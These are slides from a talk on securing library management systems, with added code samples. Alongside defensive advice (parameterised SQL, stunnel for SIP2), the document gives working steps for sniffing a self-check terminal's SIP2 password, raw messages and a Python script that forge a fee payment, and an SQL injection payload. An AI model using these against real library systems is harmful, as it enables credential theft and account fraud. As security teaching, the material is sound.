
Securing your Library Management System
Chris Cormack
Who am I?
- Kāi Tahu, Kāti Mamoe, Waitaha
- BSc Compsci, BA Maths and Māori Studies
- One of the original Koha developers
- Working at Catalyst IT
- Make my kids dress like me
- @ranginui
- chrisc@catalyst.net.nz


Know your attack surface
- Plain text passwords
- Data leak
- Website
- Selfcheck
- 3rd party content vendor
- Social engineering



Plain text passwords
If you can view yours, or any of your users' passwords, you should never ever ever use that system again
- Chris Cormack 2017

Data leak
- Don't collect what you don't need
- Don't keep what you no longer need
- Anonymise where possible
CC-BY Selka


Website(s)
- OWASP Top 10
- HTTPS (TLS 1.2)
- XSS
- SQLi
- ssllabs (test your TLS configuration)
- letsencrypt (free certificates, so cost is no excuse)
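XSS and SQLi are on the list because the LMS web front end takes patron barcodes, search terms and the like straight from the browser. As an added example (not code from the talk or from Koha), the lookup below puts the injectable form of a patron search next to the parameterised one, against a constructed in-memory patron table; the table, its rows and the function names are assumptions.

```python
"""Parameterised vs string-built SQL for a patron lookup.

Added example, not from the talk or from Koha: an in-memory SQLite table
with constructed patron rows stands in for the LMS database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three patrons, each with a card number."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE borrowers (cardnumber TEXT, surname TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO borrowers VALUES (?, ?, ?)",
        [("23456000001", "Cormack", "chrisc@example.org"),
         ("23456000002", "Smith", "smith@example.org"),
         ("23456000003", "Jones", "jones@example.org")],
    )
    return db


def lookup_unsafe(db: sqlite3.Connection, cardnumber: str) -> list:
    """The injection pattern: user input pasted into the SQL text itself."""
    sql = f"SELECT surname, email FROM borrowers WHERE cardnumber = '{cardnumber}'"
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, cardnumber: str) -> list:
    """Same query with a bound parameter: the input is data, never SQL."""
    sql = "SELECT surname, email FROM borrowers WHERE cardnumber = ?"
    return db.execute(sql, (cardnumber,)).fetchall()


# No patron holds this "barcode", but once spliced into the unsafe query it
# becomes  WHERE cardnumber = '' OR '1'='1'  and matches every row.
INJECTION = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", lookup_unsafe(db, INJECTION))  # every patron's surname and email
    print("safe:  ", lookup_safe(db, INJECTION))    # []
```

The bound-parameter form is the fix; escaping the quote by hand is not, because the next field type (a number, a LIKE pattern) needs different escaping and someone will forget.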


Selfcheck
SIP2 ... it's not cool: plain text over a raw TCP socket, no encryption, the terminal password in clear on every login
NCIP ... it's still not cool, but bloated: the same idea as XML over HTTP
Mitigations
- stunnel
- ssh tunnel
- restful api over tls
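The stunnel mitigation from the list, as an added example (not configuration shipped with the talk, Koha or stunnel): the LMS side accepts TLS and hands plaintext to the SIP2 server on loopback only; the self-check side accepts plaintext on loopback only and sends TLS, verifying the server's certificate chain and host name. The host name, the TLS port 6002 and the file paths are assumptions; 6001 is the port from the demo.

```ini
; --- /etc/stunnel/sip2.conf on the LMS host ---
; The SIP2 daemon itself must listen on 127.0.0.1:6001 only,
; otherwise the plaintext port stays reachable and stunnel buys nothing.
[sip2-server]
accept  = 6002
connect = 127.0.0.1:6001
cert    = /etc/stunnel/sip2.pem
key     = /etc/stunnel/sip2.key

; --- /etc/stunnel/sip2.conf on the self-check unit ---
; The self-check software keeps its plaintext SIP2 config, pointed at
; localhost; stunnel carries it to the LMS over TLS and refuses to connect
; if the certificate does not chain to a trusted CA for lms.example.org.
[sip2-client]
client      = yes
accept      = 127.0.0.1:6001
connect     = lms.example.org:6002
verifyChain = yes
CAfile      = /etc/ssl/certs/ca-certificates.crt
checkHost   = lms.example.org
```

Without `verifyChain` and `checkHost` the client accepts any certificate, and the person who ran the wifi demo can just as easily stand up a TLS listener of their own.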
cc-by-sa Jeffrey Beall


Let's try some stuff
SSID: Anatokai
Pass: SuperSecure

https://pastebin.com/ujfn3YET

Finding the password
- Start Wireshark (as root/administrator)
- Capture on wlan0 (or equivalent)
- Edit->Find Packet
- Packet bytes, String, search for |CP: that lands on the SIP2 93 Login message, and the CO field just before it is the self-check's password in clear


Mischief
telnet <lms host> 6001
93 Login. CN = terminal user, CO = terminal password (the one just sniffed), CP = location:
9300CNterm1|COterm1|CPcpl|
23 Patron Status Request for patron chrisc; AD (the patron's own password) is left empty:
2300120170714    004452AOcpl|AAchrisc|ACterm1|AD|
37 Fee Paid: credit 100 USD against chrisc's fines, with nothing more than the terminal login:
3720170714    0039390100USDBV100|AO|AAchrisc|ACterm1|
23 again, to watch the balance change:
2300120170714    004452AOcpl|AAchrisc|ACterm1|AD|
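The two slides above, "Finding the password" and "Mischief", are the same lesson seen from both ends of the socket, so here is one added example (not code from the talk or from Koha) that does both in code: it pulls the 93 Login out of a captured client stream exactly as the Wireshark search does by hand, then composes a Fee Paid message with the AY sequence number and AZ checksum that a server with error detection switched on expects. The capture bytes are constructed to mirror the slide's messages (with the 18-character date field restored); the message layouts come from the 3M SIP2 specification; everything else is an assumption.

```python
"""SIP2 on the wire: recover a sniffed login, then forge a valid Fee Paid.

Added example (not code from the talk or from Koha). The capture is
constructed to mirror the Mischief slide; only the message layout and the
checksum rule come from the 3M SIP2 specification.
"""
import re

# Fixed-width fields that follow the two-character command id, for the
# three message types the slide uses. Dates are 18 chars, YYYYMMDDZZZZHHMMSS,
# with the ZZZZ zone field normally four blanks.
FIXED = {
    "93": [("uid_algo", 1), ("pwd_algo", 1)],
    "23": [("language", 3), ("date", 18)],
    "37": [("date", 18), ("fee_type", 2), ("payment_type", 2), ("currency", 3)],
}
# Optional error-detection suffix: AY<seq>AZ<4 hex>, not '|' terminated.
ERROR_DETECTION = re.compile(r"AY(\d)AZ([0-9A-F]{4})$")

# Constructed client-side TCP payload, as Wireshark would show it.
CAPTURE = (
    b"9300CNterm1|COterm1|CPcpl|\r"
    b"2300120170714    004452AOcpl|AAchrisc|ACterm1|AD|\r"
)


def checksum(body: str) -> str:
    """Per spec: sum every byte from the command id up to and including the
    letters 'AZ', keep the low 16 bits, two's complement, four hex digits."""
    total = sum(body.encode("ascii")) & 0xFFFF
    return f"{(-total) & 0xFFFF:04X}"


def parse(msg: str) -> dict:
    """Split one SIP2 message into command, fixed fields and variable fields."""
    msg = msg.rstrip("\r\n")
    out = {"command": msg[:2]}
    rest = msg[2:]
    tail = ERROR_DETECTION.search(rest)
    if tail:
        out["seq"], out["checksum"] = tail.group(1), tail.group(2)
        rest = rest[: tail.start()]
    for name, width in FIXED.get(out["command"], []):
        out[name], rest = rest[:width], rest[width:]
    for field in filter(None, rest.split("|")):
        out[field[:2]] = field[2:]  # 'COterm1' -> CO: 'term1'; 'AD' -> AD: ''
    return out


def verify(msg: str) -> bool:
    """True when the trailing AZ checksum matches the rest of the message."""
    msg = msg.rstrip("\r\n")
    head, sep, tail = msg.rpartition("AZ")
    return sep == "AZ" and tail == checksum(head + "AZ")


def build(cmd: str, fixed: list, variable: list, seq: int = 0) -> str:
    """Compose a message with AY sequence and AZ checksum appended. Note the
    checksum is not a MAC: anyone who can read the stream can compute it."""
    body = cmd + "".join(fixed) + "".join(f"{k}{v}|" for k, v in variable)
    body += f"AY{seq}AZ"
    return body + checksum(body) + "\r"


def find_login(stream: bytes):
    """What the Wireshark search does by hand: locate the 93 Login and read
    the terminal user (CN), its password (CO) and location (CP) in clear."""
    for raw in stream.decode("ascii", "replace").split("\r"):
        if raw.startswith("93"):
            m = parse(raw)
            return {"user": m.get("CN"), "password": m.get("CO"),
                    "location": m.get("CP")}
    return None


if __name__ == "__main__":
    login = find_login(CAPTURE)
    print("sniffed login:", login)
    fee = build("37", ["20170714    003939", "01", "00", "USD"],
                [("BV", "100"), ("AO", "cpl"), ("AA", "chrisc"),
                 ("AC", login["user"])], seq=1)
    print("forged Fee Paid:", fee.strip(), "| checksum valid:", verify(fee))
```

The point of `build` is the caveat: turning on SIP2 error detection adds integrity against line noise, not against an attacker, since the checksum is computed from nothing secret. Only the tunnel options on the Mitigations slide change that.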

3rd party systems
- Often want to use SIP2
- Sometimes store your data (patron details, the terminal login)
- How do we know?

Social Engineering
You just spent a bunch of time attached to my wifi AP, because I asked you to